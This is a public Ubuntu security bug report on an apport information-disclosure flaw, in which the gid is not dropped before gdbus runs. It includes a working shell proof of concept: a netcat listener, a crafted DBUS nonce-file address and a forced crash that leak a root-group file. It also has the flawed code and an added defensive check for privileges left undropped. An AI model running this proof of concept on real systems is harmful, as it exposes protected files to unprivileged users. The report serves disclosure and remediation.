*** This bug is a security vulnerability *** You have been subscribed to a public security bug by Seth Arnold (seth-arnold):
-- VULNERABILITY DETAILS ------------------------
* Version tested: 18.04.4 LTS amd64 server
* Installer file: ubuntu-18.04.4-live-server-amd64.iso
* Platform tested: -
---
### Analysis
Apport, the crash reporter in Ubuntu, executes gdbus to check whether the pid
is in a closing user session. Before executing the binary, it drops privileges
to the crashed process's uid. But it doesn't drop the group id, so this can be
used to leak a file that is owned by the root group.
As a result, anyone can read a file that is readable only by the root group,
but the file size must be 16 bytes.
### Reproduction steps
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH
zdi@ubuntu:/tmp$
```
~~~python
orig_uid = os.geteuid()
# Only the effective uid is switched; the gid is left as it was.
os.setresuid(-1, os.getuid(), -1)  # <-- did not set gid
try:
    # gdbus runs with the bus address supplied in dbus_addr
    gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
                              'org.gnome.SessionManager', '-o',
                              '/org/gnome/SessionManager', '-m',
                              'org.gnome.SessionManager.IsSessionRunning'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
    (out, err) = gdbus.communicate()
    if err:
        error_log('gdbus call error: ' + err.decode('UTF-8'))
except OSError as e:
    error_log('gdbus call failed, cannot determine running session: ' +
              str(e))
    return False
finally:
    # Restore the original effective uid
    os.setresuid(-1, orig_uid, -1)
~~~
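The check below is an added example, not code from apport or from the reporter, and not the fix that was released: it reads the `Uid`, `Gid` and `Groups` lines of `/proc/<pid>/status` and lists every id a process still holds beyond the intended user, which is the condition the excerpt above leaves behind. The helper names (`parse_ids`, `leftover_ids`, `drop_to_user`) and the two sample status texts are constructed for illustration.

```python
import os

def parse_ids(status_text):
    """Extract the Uid, Gid and Groups fields from /proc/<pid>/status text."""
    ids = {"Uid": [], "Gid": [], "Groups": []}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key in ids:
            ids[key] = [int(v) for v in value.split()]
    return ids

def leftover_ids(status_text, uid, gid):
    """Return (field, ids) pairs for every id held beyond the target uid/gid."""
    ids = parse_ids(status_text)
    leftovers = []
    for field, want in (("Uid", uid), ("Gid", gid), ("Groups", gid)):
        extra = sorted(set(ids[field]) - {want})
        if extra:
            leftovers.append((field, extra))
    return leftovers

def drop_to_user(uid, gid):
    """Full drop for a child process (hypothetical helper, e.g. a preexec_fn).
    Groups and gid go first: once the uid is gone, changing them is refused."""
    os.setgroups([gid])
    os.setresgid(gid, gid, gid)
    os.setresuid(uid, uid, uid)
    with open("/proc/self/status") as f:
        left = leftover_ids(f.read(), uid, gid)
    if left:
        raise PermissionError("privileges not fully dropped: %r" % (left,))

# Constructed sample: uid switched to 1001, gid and groups still root's.
UID_ONLY_DROP = (
    "Name:\tgdbus\n"
    "Uid:\t1001\t1001\t1001\t1001\n"
    "Gid:\t0\t0\t0\t0\n"
    "Groups:\t0\n"
)
# Constructed sample: uid, gid and supplementary groups all switched.
FULL_DROP = (
    "Name:\tgdbus\n"
    "Uid:\t1001\t1001\t1001\t1001\n"
    "Gid:\t1001\t1001\t1001\t1001\n"
    "Groups:\t1001\n"
)

if __name__ == "__main__":
    print(leftover_ids(UID_ONLY_DROP, 1001, 1001))
    print(leftover_ids(FULL_DROP, 1001, 1001))
```
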
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga (@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day
Initiative
** Affects: apport (Ubuntu)
Importance: Medium
Status: Fix Released
** Affects: apport (Ubuntu Xenial)
Importance: Medium
Status: Fix Released
** Affects: apport (Ubuntu Bionic)
Importance: Medium
Status: Fix Released
** Affects: apport (Ubuntu Eoan)
Importance: Medium
Status: Confirmed
** Affects: apport (Ubuntu Focal)
Importance: Medium
Status: Fix Released
--
[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure
Vulnerability
https://bugs.launchpad.net/bugs/1885633
